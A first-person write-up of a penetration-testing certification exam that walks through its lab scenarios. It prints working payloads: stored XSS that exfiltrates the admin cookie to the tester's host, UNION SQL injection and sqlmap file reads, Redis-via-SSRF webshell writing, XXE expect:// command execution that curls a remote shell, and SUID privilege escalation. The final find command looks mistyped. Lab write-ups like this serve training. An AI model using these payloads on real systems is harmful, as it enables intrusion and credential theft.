The exam for pts took less than half a month from registration to the test. If you have a foundation in practicing questions, it's quite easy to pass, because many questions are basically the same as the training materials. However, there are some questions that the training institutions also don't know. For example, in this exam, the last major question had the service inside as nacos, and nacos has no exp. I tried common weak passwords, but couldn't get in, so I didn't attempt it. Most of the questions only had 2 keys (20 points), and if you ensured that all the previous keys were obtained, you would already have 80 points. As long as you have more than 70 points, you pass.
Let me talk about the questions I encountered in the exam.
Scenario 1#
xss+sqli+file reading, quite simple
For xss, you need to use Python to start a web service on the attacking machine, then insert the payload. Here, it utilizes a stored XSS vulnerability to write the payload and obtain the administrator's cookie.
<script>document.write('<img src="http://ip:1234/?cookie='+document.cookie+'" />')</script>
Obtained the administrator's cookie.
Through the browser right-click Page - Inspect
, select Application
, find Storage - Cookies
, and replace it with the administrator's cookie.
sqli payload
http://ip:3603/admin/edit.php?id=12312/**/UniOn/**/SeLEct/**/1,2,load_file("/var/key2"),4#
Or run sqlmap
http://IP:3603/admin/edit.php?id=11 (GET)
# sqlmap.py -u http://10.52.0.29:3603/admin/edit.php?id=11 --cookie=PHPSESSID=732ece3c4dcdba588d48593d689bf927 --dbms mysql --file-read /var/key2
Arbitrary file reading
http://IP:3603/admin/setting.php?page=/tmp/key3
Scenario 2#
ssrf+redis getshell
ssrf: Directory scan robots.txt, download backup.zip, unzip to get a txt file, which will provide a web port. Input http://localhost:1234 in the search box provided by the question to obtain the first key.
redis getshell:
Write webshell
dict://localhost:6379/flushall
dict://localhost:6379/set:1:'<?php eval($_POST[1]);?>'
dict://localhost:6379/config:set:dir:/var/www/html/app1
dict://localhost:6379/config:set:dbfilename:a.php
dict://localhost:6379/save
Write private key
Obtained the second key, the third key is in the task schedule.
Scenario 3#
An xxe vulnerability
Write webshell using expect, expect can execute commands, by starting a web service on the attacking machine and using curl to request.
Execute command
<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://id">]><p>&b;</p>
Write shell
<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://curl$IFS$9-O$IFS$9'192.168.80.48:8088/shell.php'">]><p>&b;</p>
Privilege escalation
find / -perm -u=s -type f 2>/dev/null
find 1 -exec 1s /root \;